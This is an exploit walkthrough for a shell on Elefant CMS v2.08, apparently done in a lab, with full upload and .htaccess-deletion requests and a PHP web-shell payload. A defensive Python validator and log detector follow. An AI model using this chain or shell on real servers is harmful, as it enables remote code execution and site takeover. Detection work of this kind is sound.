Elefant CMS v2.08 getshell walkthrough (not CVE-2017-20063)
A new vulnerability found after CVE-2017-20063; CVE-2017-20063 only applies to version 1.3.
Vulnerable code: apps/filemanager/upload/drop.php
First, upload a file:
127.0.0.1/filemanager
Then rename it to 99.pht.
You can also use the following request to upload a PHP file for testing.
My upload did not succeed this way; I recommend the method above:
POST /filemanager/upload/drop HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 498
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="path"
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="token"
ed50295e5e66b7012faaea35359a60cb
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="file"; filename="11a.php"
Content-Type: xxx
GIF89a
<script language="pHp">phpinfo()</script>
<?php phpinfo();?>
<?php system($_POST['p']);?>
--------multipartformboundary1685373759841--
Next, use the API to delete the .htaccess in the root directory:
/filemanager/api/rm/.htaccess
The full request is as follows:
POST /filemanager/api/rm/.htaccess HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 511
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close
After the deletion you can see the success indicator:
It reports that the pseudo-static (rewrite) file was deleted successfully:
Visit the .pht file you just renamed, /files/31.pht,
and you get a shell:
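As an added defender-side example (not part of the original post and not Elefant's own code), the following Python script shows how both halves of this chain can be checked: a name-validation helper that rejects the .pht/.phtml-style extensions and dotfiles such as .htaccess that a file manager should never write, rename to, or delete, and a detector that scans web-server access-log lines for the two requests visible on this page, a removal of .htaccess via /filemanager/api/rm/ and an executable file served from /files/. The log lines, the extension list, the protected-file list and the log regex are constructed for this example.

```python
import re
from urllib.parse import unquote

# Extensions commonly mapped to the PHP interpreter by Apache/nginx handler
# configs. ".pht" and ".phtml" are the ones a naive ".php"-only check misses.
# Constructed list for this example; align it with your server's handler config.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar", "phps"}

# Files whose removal through a file manager API strips server-side protection
# (constructed list for this example).
PROTECTED_FILES = {".htaccess", ".htpasswd", "web.config", ".user.ini"}

# Apache/nginx "combined" access-log format (constructed regex for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines: one client uploads, deletes .htaccess, then
# requests a .pht file from /files/; a second client does only benign things.
SAMPLE_LOG = """\
203.0.113.5 - - [29/May/2023:15:02:39 +0000] "POST /filemanager/upload/drop HTTP/1.1" 200 85 "-" "Mozilla/5.0"
203.0.113.5 - - [29/May/2023:15:03:11 +0000] "POST /filemanager/api/rm/.htaccess HTTP/1.1" 200 20 "-" "Mozilla/5.0"
203.0.113.5 - - [29/May/2023:15:03:40 +0000] "POST /files/31.pht HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
198.51.100.9 - - [29/May/2023:15:04:02 +0000] "GET /files/report.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
198.51.100.9 - - [29/May/2023:15:04:30 +0000] "POST /filemanager/api/rm/old-notes.txt HTTP/1.1" 200 20 "-" "Mozilla/5.0"
not a log line
"""


def executable_extension(path):
    """Return the first server-executable extension found in the file name
    of `path` (case-insensitive, URL-decoded), or None if there is none.
    Every dotted segment after the first is checked, so double extensions
    such as "x.php.jpg" are surfaced for review as well."""
    name = unquote(path.split("?", 1)[0]).rsplit("/", 1)[-1]
    for part in name.lower().split(".")[1:]:
        if part in EXECUTABLE_EXTENSIONS:
            return part
    return None


def validate_filemanager_name(name):
    """Mitigation side: return True only for names a file manager may create,
    rename to, or delete. Dotfiles, protected files and executable extensions
    are refused; the destination name of a rename needs the same check as an
    upload, otherwise "safe.txt -> 99.pht" bypasses the upload filter."""
    base = name.rsplit("/", 1)[-1].strip()
    if not base or base in PROTECTED_FILES or base.startswith("."):
        return False
    return executable_extension(base) is None


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Scan access-log lines; return a list of (ip, path, reason) findings.
    A client that removed a protected file and then fetched an executable
    file from /files/ gets the correlated, higher-severity reason."""
    findings = []
    removed_protection = set()  # client IPs that deleted a protected file
    rm_prefix = "/filemanager/api/rm/"
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        clean = unquote(rec["path"].split("?", 1)[0])
        if clean.startswith(rm_prefix):
            target = clean[len(rm_prefix):].rsplit("/", 1)[-1]
            if target in PROTECTED_FILES:
                removed_protection.add(ip)
                findings.append((ip, clean, "protected file removed via filemanager API"))
        elif clean.startswith("/files/"):
            ext = executable_extension(clean)
            if ext:
                reason = f"executable .{ext} served from upload directory (HTTP {rec['status']})"
                if ip in removed_protection:
                    reason += " after .htaccess removal by the same client"
                findings.append((ip, clean, reason))
    return findings


if __name__ == "__main__":
    for ip, path, reason in detect(SAMPLE_LOG.splitlines()):
        print(f"{ip} {path}: {reason}")
```

The detector only sees what reaches the access log: the rename itself happens through the file manager UI and is not visible by path here, which is why the validation helper is the control that actually closes the hole, and the log check is the backstop that catches a deployed file being executed. Run it against real logs by replacing SAMPLE_LOG with the lines from the web server.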